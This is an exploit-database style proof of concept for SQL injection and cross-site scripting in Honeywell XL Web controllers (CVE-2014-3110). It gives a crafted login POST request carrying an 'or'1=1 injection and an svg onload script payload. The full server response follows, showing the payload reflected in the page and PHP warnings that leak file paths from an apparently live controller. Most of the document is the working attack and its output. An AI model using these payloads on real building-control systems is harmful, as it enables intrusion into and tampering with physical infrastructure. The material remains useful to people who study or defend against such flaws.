Publish Date: 24 May 2018
# Exploit Title: Honeywell XL Web Controller SQLi & XSS
# Date: 2018-05-24
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.honeywell.com
# Version: WebVersion : XL1000C50 EXCEL WEB 52 I/O, XL1000C100 EXCEL WEB
104 I/O, XL1000C500 EXCEL WEB 300 I/O, XL1000C1000 EXCEL WEB 600 I/O,
XL1000C50U EXCEL WEB 52 I/O UUKL, XL1000C100U EXCEL WEB 104 I/O UUKL,
XL1000C500U EXCEL WEB 300 I/O UUKL, and XL1000C1000U EXCEL WEB 600 I/O UUKL.
# Tested on: Linux
# CVE: CVE-2014-3110
--------------- ---> Proof Of Concept <--------------------------
POST /standard/mainframe.php HTTP/1.1
Cache-Control: no-cache
Referer: http://TargetIP/standard/mainframe.php
Accept: text/xml,application/xml,application/xhtml+xml,text/
html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
Cookie: Locale=1033
Accept-Encoding: gzip, deflate
Content-Length: 222
Content-Type: application/x-www-form-urlencoded
SessionID=&LocaleID='or'1=1&LoginSessionID=&LoginUserNameMD5="/><svg/
onload=prompt(/XSS/)>
&LoginPasswordMD5=&LoginCommand=&LoginPassword=&
rememberMeCheck=&LoginDevice=192.168.1.12&LoginUserName=Guest
HTTP/1.1 200 OK
Set-Cookie: rememberUser=deleted; expires=Wednesday, 24-May-17 08:54:02
GMT; path=/
Server: Apache/1.3.23 (Unix) PHP/4.4.9
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Transfer-Encoding: chunked
Date: Thu, 24 May 2018 08:54:03 GMT
<br />
<b>Warning</b>: xw_get_users() expects parameter 1 to be long, string
given in <b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>97</b><br />
<br />
<b>Warning</b>: xml_load_texts_file() expects parameter 2 to be long,
string given in <b>/mnt/mtd6/xlweb/web/standard/include/elements.php</b> on
line <b>247</b><br />
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<meta http-equiv="expires" content="0"/>
<link rel="stylesheet" href="include/honeywell.css"/>
<title><br />
<b>Notice</b>: Undefined index: HeadTitle in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>300</b><br />
</title>
<script language="JavaScript">
<!--
var NS4 = document.layers;
// if the selected element has alarms, the element within the
// drop Down-list should be styled red.
// This is done for firefox which does not accept even the
// usage of inline styles.
function setOptionColor() {
if(document.getElementById("LoginSelect") != null) {
var selectionBox = document.getElementById("LoginSelect");
var selectedElement = selectionBox.selectedIndex;
var selectedOption = selectionBox.options[selectedElement];
if(selectedOption.getAttribute("class") != null) {
var className = selectedOption.getAttribute("class");
if(className == "red") {
selectionBox.style.color = "#FF0000";
}
}
}
}
function onSessionChange (sSessionID, sLocaleID)
{
document.forms.main.elements["SessionID"].value = sSessionID;
document.forms.main.elements["LocaleID"].value = sLocaleID;
submitCommand ("ChangeSession");
}
function onDeviceListChange ()
{
submitCommand ("UpdateDeviceList");
}
function onSessionCreated (sResult, sSessionID)
{
if (sResult != "4194561")
{
if (sResult == "196626")
{
alert ("<br />
*<b>Notice</b>: Undefined index: CreateSessionFailed in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>346</b><br />*
*\n" +*
"\n" +
"<br />
*<b>Notice</b>: Undefined index: TooManyUsers in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>348</b><br />*
*");*
}
else
{
alert ("<br />
*<b>Notice</b>: Undefined index: CreateSessionFailed in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>352</b><br />*
*\n" +*
"\n" +
"<br />
*<b>Notice</b>: Undefined index: OperationalProblem in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>354</b><br />*
*");*
}
return;
}
var sUserName = document.forms.main.elements["LoginUserName"].value;
var sPassword = calcMD5 (document.forms.main.elements[
"LoginPassword"].value);
sPassword = calcMD5 (sSessionID + sUserName + sPassword);
sUserName = calcMD5 (sUserName);
document.forms.main.elements["LoginSessionID"].value = sSessionID;
document.forms.main.elements["LoginUserNameMD5"].value = sUserName;
document.forms.main.elements["LoginPasswordMD5"].value = sPassword;
submitCommand ("Login");
}
function showHelp (sHelpID)
{
var lWidth = 360;
var lHeight = 320;
var lLeft = (screen.width - lWidth) / 2;
var lTop = (screen.height - lHeight) / 2;
openDependent (*"login/help.php?Locale="/><svg/onload=prompt(/XSS/)>*
&ID=" + sHelpID,
"Help",
"width=" + lWidth + ",height=" + lHeight + ",left=" +
lLeft + ",top=" + lTop + ",scrollbars=yes,resizable=yes");
}
function submitCommand (sCommand)
{
//document.forms.main.elements["LoginPassword"].value = "";
document.forms.main.elements["LoginCommand"].value = sCommand;
document.forms.main.submit ();
}
function checkEnter (event)
{
var lkeyCode = 0;
if (NS4)
{
lkeyCode = event.which;
}
else
{
lkeyCode = event.keyCode;
}
if (lkeyCode == 13)
{
createSession ();
}
}
function changeDevice ()
{
var oOptions = document.forms.main.elements["
LoginDevice"].options;
for (var lIndex = 0; lIndex < oOptions.length; lIndex++)
{
if (oOptions[lIndex].selected)
{
var sURL = "http://" + oOptions[lIndex].value;
sURL += ":80";
sURL += "/standard/";
sURL += "default.php?Locale="/><svg/onload=prompt(/XSS/)>
";
parent.parent.window.location.replace (sURL);
return;
}
}
}
function createSession ()
{
if (top.frames.updateframe &&
top.frames.updateframe.createSession)
{
top.frames.updateframe.createSession ();
}
else
{
var lLeft = screen.width;
var lTop = screen.height;
var oWindow = open ("login/session.php",
"Session",
"width=0,height=0,left=" + lLeft + ",top=" +
lTop + ",dependent=yes,locationbar=no,menubar=no,status=no,scrollbars=no");
}
}
function onLoad ()
{
if (top.frames.updateframe)
{
top.frames.updateframe.location.replace ("login/update.php");
}
document.main.LoginUserName.focus ();
}
//-->
</script>
<script type="text/javascript" src="scripts/md5.js"></script>
</head>
<body onload="setOptionColor()" class="colored" onLoad="onLoad ();"
style="background-image: url(images/bg_headline_dialog.gif);
background-repeat:repeat-x;">
<form name="main" method="post" action="/standard/mainframe.php">
<input type="hidden" name="SessionID"/>
<input type="hidden" name="LocaleID" value="'"--></
style></scRipt><scRipt>netsparker(0x0001AA)</scRipt>"/>
<input type="hidden" name="rememberMeCheck" value=""/>
<input type="hidden" name="LoginSessionID"/>
<input type="hidden" name="LoginUserNameMD5"/>
<input type="hidden" name="LoginPasswordMD5"/>
<input type="hidden" name="LoginCommand"/>
<!-- *******************************************************************
-->
<!-- * Controller Name
* -->
<!-- *******************************************************************
-->
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr><td bgcolor="#7F7F7F"><img alt=""
src="images/blank.gif" width="1" height="1"/></td></tr>
<tr><td bgcolor="#000000"><img alt="" src="images/blank.gif"
width="1" height="1"/></td></tr>
<tr>
<td class="headline" height="16" nowrap="">
&nbsp;AUM0_MUSEO_LANA.XLWEB_MUSEO_LANA.<br />
<b>Notice</b>: Undefined index: Title in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>509</b><br />
</td>
</tr>
</table>
<table width="100%" height="75%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td width="50%">&nbsp;</td>
<td>
<table border="0" cellspacing="7" cellpadding="0">
<!-- ******************************
************************************* -->
<!-- * Custom image
* -->
<!-- ******************************
************************************* -->
<tr>
<td>
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td align="center">
<img alt="" src="login/loginlogo.gif"
/>
</td>
</tr>
<tr><td><img alt="" src="images/blank.gif" width="1"
height="7"/></td></tr>
</table>
</td>
</tr>
<!-- ******************************
************************************* -->
<!-- * Login group
* -->
<!-- ******************************
************************************* -->
<tr>
<td>
<br />
<b>Notice</b>: Undefined index: Login in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>596</b><br />
<br />
<b>Notice</b>: Undefined index: AltTitle in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>597</b><br />
<table width="100%" border="0" cellspacing="0" cellpadding="0"
bgcolor="#B8D7F0">
<tr>
<td><img alt="" src="images/group_left_top.gif" width="5"
height="5"/></td>
<td><img alt="" src="images/blank.gif" width="1" height="5"/></td>
<td align="right"><img alt="" src="images/group_right_top.gif"
width="5" height="5"/></td>
</tr>
<tr>
<td><img alt="" src="images/blank.gif" width="5" height="1"/></td>
<td width="100%" valign="top">
<table width="100%" border="0" cellspacing="0" cellpadding="2">
<tr>
<td colspan="2" class="groupheader" nowrap="">
<b></b>
</td>
<td align="right">
&nbsp;
</td>
</tr>
<tr>
<td>&nbsp;</td>
<td width="100%">
<table border="0" cellpadding="1" cellspacing="1">
<tr>
<td nowrap=""><br />
<b>Notice</b>: Undefined index: Controller in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>605</b><br />
:&nbsp;</td>
<td>
<select id="LoginSelect" class="loginSelect"
name="LoginDevice" onchange="changeDevice ();" style="width:150px;">
<option
selected="" value="192.168.1.12"
class="red" style="color:#FF0000;
background-color:#D8E8F8">
XLWEB_MUSEO_LANA
</option>
</select>
</td>
<td>&nbsp;</td>
<td align="right">
<img alt="" name="LoginAlarm"
src="footer/alarm_red_tr.gif"> </td>
</tr>
<tr>
<td nowrap=""><br />
<b>Notice</b>: Undefined index: UserName in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>632</b><br />
:&nbsp;</td>
<td>
<select name="LoginUserName" style="width:150px;">
<br />
<b>Warning</b>: Invalid argument supplied for foreach() in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>650</b><br />
</select>
</td>
</tr>
<tr>
<td nowrap=""><br />
<b>Notice</b>: Undefined index: Password in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>689</b><br />
:&nbsp;</td>
<td>
<!--<input type="password" class="text" name="LoginPassword"
style="width:150px;" onKeyPress="checkEnter (event)"/>-->
<input name="LoginPassword" type="password" onKeyDown="checkEnter (event)"
size="25" class="ppinput" value=""/>
</td>
</tr>
<tr>
<td><br />
<b>Notice</b>: Undefined index: RememberMeCheckbox in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>720</b><br />
</td>
<td><input id="rememberMeCheck" name="rememberMeCheck" type="checkbox"
/></td>
</tr>
<tr>
<td><img alt="" src="images/blank.gif" width="90"
height="2"/></td>
<td><img alt="" src="images/blank.gif" width="1"
height="2"/></td>
</tr>
</table>
</td>
<td>&nbsp;</td>
</tr>
</table>
</td>
<td><img alt="" src="images/blank.gif" width="5" height="1"/></td>
</tr>
<tr>
<td><img alt="" src="images/group_left_bottom.gif" width="5"
height="5"/></td>
<td><img alt="" src="images/blank.gif" width="1" height="5"/></td>
<td align="right"><img alt="" src="images/group_right_bottom.gif"
width="5" height="5"/></td>
</tr>
</table>
</td>
</tr>
<!-- ******************************
************************************* -->
<!-- * Button
* -->
<!-- ******************************
************************************* -->
<tr>
<td>
<table border="0" cellspacing="7" cellpadding="0">
<tr>
<td>
<br />
<b>Notice</b>: Undefined index: LoginButton in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>750</b><br />
<br />
<b>Notice</b>: Undefined index: AltTitle in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>751</b><br />
<table border="0" cellspacing="0" cellpadding="0" >
<tr>
<td><img alt="" src="images/buttonleft.gif" width="7"
height="18"/></td>
<td background="images/buttonmiddle.gif" nowrap=""><a
class="button" href="JavaScript:createSession ();" title=""></a></td>
<td><img alt="" src="images/buttonright.gif" width="7"
height="18"/></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
<td width="50%">&nbsp;</td>
</tr>
</table>
</form>
</body>
</html>
<p>
Vulmon